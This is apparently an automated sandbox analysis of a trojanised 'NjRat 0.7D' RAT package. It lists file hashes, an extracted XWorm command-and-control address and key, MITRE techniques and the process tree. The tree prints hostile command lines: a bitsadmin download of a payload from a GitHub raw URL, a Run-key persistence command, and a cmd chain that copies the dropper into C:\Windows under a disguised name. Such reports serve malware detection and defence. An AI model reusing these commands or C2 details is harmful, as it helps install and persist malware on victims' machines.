Analysis
-
max time kernel
150s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2024 10:24
Behavioral task
behavioral1
Sample
NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
Resource
win7-20240708-en
General
-
Target
NjRat.0.7D-main/NjRat.0.7D/NjRat 0.7D.exe
-
Size
8.9MB
-
MD5
3e8dc9ba82863bd3c1e5ec769d2c187f
-
SHA1
fa80a09b2a6804868c26dbeb62b073d1546a132b
-
SHA256
6f4fb430fc36355253eff73a164d147ad1fa17dc9c62dba0984d003e1db74880
-
SHA512
10e375f93a01925833c3199889afe889f8f83422a4aee8b21cddda65f5436184693d7156b9ae46be1fc25ef886d07af5fe9db15c297b7e58d8faea965151234c
-
SSDEEP
196608:pG2cZZTlJT3BGzYRR/x8i1hDs79+wPUy07BtOxmgVfMpobGHCWhyn:82cXTlJT37RRKi1169+xy0DOxHVf7bGm
Malware Config
Extracted
xworm
83.143.112.30:3096
Dza3YLL2q2qcgzdH
Signatures
-
Detect Xworm Payload 1 IoCs
Processes:
resource yara_rule behavioral2/memory/3716-51-0x0000000000400000-0x0000000000414000-memory.dmp family_xworm -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
NjRat 0.7D.exeWScript.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation NjRat 0.7D.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation Isolation graphique de périphérique audio Windows .exe Key value queried \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\Control Panel\International\Geo\Nation WatchDog.exe -
Executes dropped EXE 5 IoCs
Processes:
NjRat 0.7D.exeaudiodg.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeWatchDog.exepid process 2948 NjRat 0.7D.exe 1960 audiodg.exe 4004 Isolation graphique de périphérique audio Windows .exe 4468 WatchDog.exe 4544 WatchDog.exe -
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\audiodg = "C:\\Windows\\Isolation graphique de périphérique audio Windows .exe" reg.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
Isolation graphique de périphérique audio Windows .exedescription pid process target process PID 4004 set thread context of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe -
Drops file in Windows directory 2 IoCs
Processes:
cmd.exedescription ioc process File created C:\Windows\Isolation graphique de périphérique audio Windows .exe cmd.exe File opened for modification C:\Windows\Isolation graphique de périphérique audio Windows .exe cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 12 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
NjRat 0.7D.execmd.exereg.exeInstallUtil.exeWatchDog.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeaudiodg.execmd.exePING.EXEPING.EXEPING.EXEdescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NjRat 0.7D.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language InstallUtil.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WatchDog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Isolation graphique de périphérique audio Windows .exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WatchDog.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language audiodg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 5 IoCs
Adversaries may check for Internet connectivity on compromised systems.
Processes:
PING.EXEPING.EXEcmd.exePING.EXEcmd.exepid process 4848 PING.EXE 3624 PING.EXE 4180 cmd.exe 3604 PING.EXE 1436 cmd.exe -
Modifies registry class 1 IoCs
Processes:
NjRat 0.7D.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-1302416131-1437503476-2806442725-1000_Classes\Local Settings NjRat 0.7D.exe -
Runs ping.exe 1 TTPs 3 IoCs
Processes:
PING.EXEPING.EXEPING.EXEpid process 3624 PING.EXE 3604 PING.EXE 4848 PING.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
InstallUtil.exepid process 3716 InstallUtil.exe -
Suspicious behavior: EnumeratesProcesses 34 IoCs
Processes:
audiodg.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exeWatchDog.exepid process 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 1960 audiodg.exe 4004 Isolation graphique de périphérique audio Windows .exe 4004 Isolation graphique de périphérique audio Windows .exe 4004 Isolation graphique de périphérique audio Windows .exe 4004 Isolation graphique de périphérique audio Windows .exe 4468 WatchDog.exe 4544 WatchDog.exe 4544 WatchDog.exe 4544 WatchDog.exe 4004 Isolation graphique de périphérique audio Windows .exe 4004 Isolation graphique de périphérique audio Windows .exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
audiodg.exeIsolation graphique de périphérique audio Windows .exeInstallUtil.exeWatchDog.exeWatchDog.exedescription pid process Token: SeDebugPrivilege 1960 audiodg.exe Token: SeDebugPrivilege 4004 Isolation graphique de périphérique audio Windows .exe Token: SeDebugPrivilege 3716 InstallUtil.exe Token: SeDebugPrivilege 4468 WatchDog.exe Token: SeDebugPrivilege 4544 WatchDog.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
NjRat 0.7D.exepid process 2948 NjRat 0.7D.exe -
Suspicious use of SendNotifyMessage 1 IoCs
Processes:
NjRat 0.7D.exepid process 2948 NjRat 0.7D.exe -
Suspicious use of WriteProcessMemory 45 IoCs
Processes:
NjRat 0.7D.exeWScript.exeaudiodg.execmd.execmd.exeIsolation graphique de périphérique audio Windows .exeWatchDog.exedescription pid process target process PID 2772 wrote to memory of 2948 2772 NjRat 0.7D.exe NjRat 0.7D.exe PID 2772 wrote to memory of 2948 2772 NjRat 0.7D.exe NjRat 0.7D.exe PID 2772 wrote to memory of 2948 2772 NjRat 0.7D.exe NjRat 0.7D.exe PID 2772 wrote to memory of 3880 2772 NjRat 0.7D.exe WScript.exe PID 2772 wrote to memory of 3880 2772 NjRat 0.7D.exe WScript.exe PID 2772 wrote to memory of 1960 2772 NjRat 0.7D.exe audiodg.exe PID 2772 wrote to memory of 1960 2772 NjRat 0.7D.exe audiodg.exe PID 2772 wrote to memory of 1960 2772 NjRat 0.7D.exe audiodg.exe PID 3880 wrote to memory of 2932 3880 WScript.exe bitsadmin.exe PID 3880 wrote to memory of 2932 3880 WScript.exe bitsadmin.exe PID 1960 wrote to memory of 4180 1960 audiodg.exe cmd.exe PID 1960 wrote to memory of 4180 1960 audiodg.exe cmd.exe PID 1960 wrote to memory of 4180 1960 audiodg.exe cmd.exe PID 4180 wrote to memory of 3604 4180 cmd.exe PING.EXE PID 4180 wrote to memory of 3604 4180 cmd.exe PING.EXE PID 4180 wrote to memory of 3604 4180 cmd.exe PING.EXE PID 1960 wrote to memory of 1436 1960 audiodg.exe cmd.exe PID 1960 wrote to memory of 1436 1960 audiodg.exe cmd.exe PID 1960 wrote to memory of 1436 1960 audiodg.exe cmd.exe PID 1436 wrote to memory of 4848 1436 cmd.exe PING.EXE PID 1436 wrote to memory of 4848 1436 cmd.exe PING.EXE PID 1436 wrote to memory of 4848 1436 cmd.exe PING.EXE PID 4180 wrote to memory of 4792 4180 cmd.exe reg.exe PID 4180 wrote to memory of 4792 4180 cmd.exe reg.exe PID 4180 wrote to memory of 4792 4180 cmd.exe reg.exe PID 1436 wrote to memory of 3624 1436 cmd.exe PING.EXE PID 1436 wrote to memory of 3624 1436 cmd.exe PING.EXE PID 1436 wrote to memory of 3624 1436 cmd.exe PING.EXE PID 1436 wrote to memory of 4004 1436 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1436 wrote to memory of 4004 1436 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 1436 wrote to memory of 4004 1436 cmd.exe Isolation graphique de périphérique audio Windows .exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 3716 4004 Isolation graphique de périphérique audio Windows .exe InstallUtil.exe PID 4004 wrote to memory of 4468 4004 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 4004 wrote to memory of 4468 4004 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 4004 wrote to memory of 4468 4004 Isolation graphique de périphérique audio Windows .exe WatchDog.exe PID 4468 wrote to memory of 4544 4468 WatchDog.exe WatchDog.exe PID 4468 wrote to memory of 4544 4468 WatchDog.exe WatchDog.exe PID 4468 wrote to memory of 4544 4468 WatchDog.exe WatchDog.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"C:\Users\Admin\AppData\Local\Temp\NjRat.0.7D-main\NjRat.0.7D\NjRat 0.7D.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"C:\Users\Admin\AppData\Local\Temp\NjRat 0.7D.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2948 -
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\install.vbs"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3880 -
C:\Windows\System32\bitsadmin.exe"C:\Windows\System32\bitsadmin.exe" /transfer myDownloadJob /download /priority normal https://raw.githubusercontent.com/BlackAll9/rrr/main/MicrosoftEdge.rar C:\Users\Admin\AppData\Roaming\MicrosoftEdge.rar3⤵
- Download via BitsAdmin
PID:2932 -
C:\Users\Admin\AppData\Roaming\audiodg.exe"C:\Users\Admin\AppData\Roaming\audiodg.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1960 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 9 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"3⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:4180 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 94⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3604 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "audiodg" /t REG_SZ /d "C:\Windows\Isolation graphique de périphérique audio Windows .exe"4⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4792 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c ping 127.0.0.1 -n 20 > nul && copy "C:\Users\Admin\AppData\Roaming\audiodg.exe" "C:\Windows\Isolation graphique de périphérique audio Windows .exe" && ping 127.0.0.1 -n 20 > nul && "C:\Windows\Isolation graphique de périphérique audio Windows .exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:1436 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 204⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4848 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 204⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3624 -
C:\Windows\Isolation graphique de périphérique audio Windows .exe"C:\Windows\Isolation graphique de périphérique audio Windows .exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4004 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"5⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of AdjustPrivilegeToken
PID:3716 -
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"5⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4468 -
C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"C:\Users\Admin\AppData\Local\Temp\WatchDog.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4544
Network
MITRE ATT&CK Enterprise v15
Persistence
BITS Jobs
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD57dca233df92b3884663fa5a40db8d49c
SHA1208b8f27b708c4e06ac37f974471cc7b29c29b60
SHA25690c83311e35da0b5f8aa65aa2109745feb68ee9540e863f4ed909872e9c6a84c
SHA512d134b96fd33c79c85407608f76afc5a9f937bff453b1c90727a3ed992006c7d4c8329be6a2b5ba6b11da1a32f7cd60e9bc380be388b586d6cd5c2e6b1f57bd07
-
Filesize
8.5MB
MD570ea9c044c9a766330d3fe77418244a5
SHA118602d0db52917b88cbdab84ba89181e6fd4686a
SHA256b78fb092e151db613cba51d7f2532547e48c6f4712809a485f272e2ab55776a5
SHA5125261865e7ca21e928b956a97518366c9dc218a2312961e0ba0b72b37ae7c797176382de3c3dc1d2949aca51c3db330562f1087a71efdc7c3c3b8f8928872f917
-
Filesize
76KB
MD50e362e7005823d0bec3719b902ed6d62
SHA1590d860b909804349e0cdc2f1662b37bd62f7463
SHA2562d0dc6216f613ac7551a7e70a798c22aee8eb9819428b1357e2b8c73bef905ad
SHA512518991b68496b3f8545e418cf9b345e0791e09cc20d177b8aa47e0aba447aa55383c64f5bdaca39f2b061a5d08c16f2ad484af8a9f238ca23ab081618fba3ad3
-
Filesize
78B
MD5771228b914581d4c92cb184ecf761d22
SHA1858b7e3e6ff6191dc7fd561510d24c3fb424ed8f
SHA256ba4755fd48143ad928ffb6cc38ef749b1f11ddb204a04856d32ea53c967d448c
SHA51241537a8d5cbe04a53cf9c5f8eea68cc045b5c05336bcce162c88c00a66021511afbb5d1083b7883bc0e30e22f6d35d7421df486d25a102621f972bb1b5b3b1bf
-
Filesize
81B
MD50017979068fbfbd0fe002d93eed5fcd0
SHA1e8cdad526e0698a58a1ef1818785bd1915137615
SHA256669c02322dda6a727344f84900f27e07aab26f54c16319aefac42d8b602f4a2c
SHA512dd819ffaf1e09af7f54ce515fd936e775ecdf6a82cbe53dac72f0ca1da024b8dd3fc8f3e94c8c48f2a4d5a9e942afd73ebb1d114c016363e1023b3b947bd6a11
-
Filesize
355KB
MD5d9dfa8ba182529445890b5021e159b77
SHA164f8724f8cd76adff12364e6bb2fc9eaceadb1ba
SHA25660df809a613aab714e2edad3338500a081fbae866cee3a4a3113abed60f5d59f
SHA512d18f5d13d5ea4226e309fe7d5b59eac5770f391b92c5a03e0f14cd5e23a45b75ed2353e7a388198162061686d9c4675e11428d0362a01b7e05a0b4638fb10803
-
Filesize
19KB
MD54724c9dce57bc0472ed610ba16d08894
SHA1d5fea3520146ccbf54c31b3b4868de499022fb37
SHA256aaf7bddca268a157d995df03454ba4d15df36c6b717ebc7fb018e3c5101ef2fb
SHA512d1ec126257698cecfcebf3db17c910b33a231d08d955a4659ed417e1c115976506e1bd55db463c0e1414e39e6f90f11b20ab2110048bd947e51d9473db292b18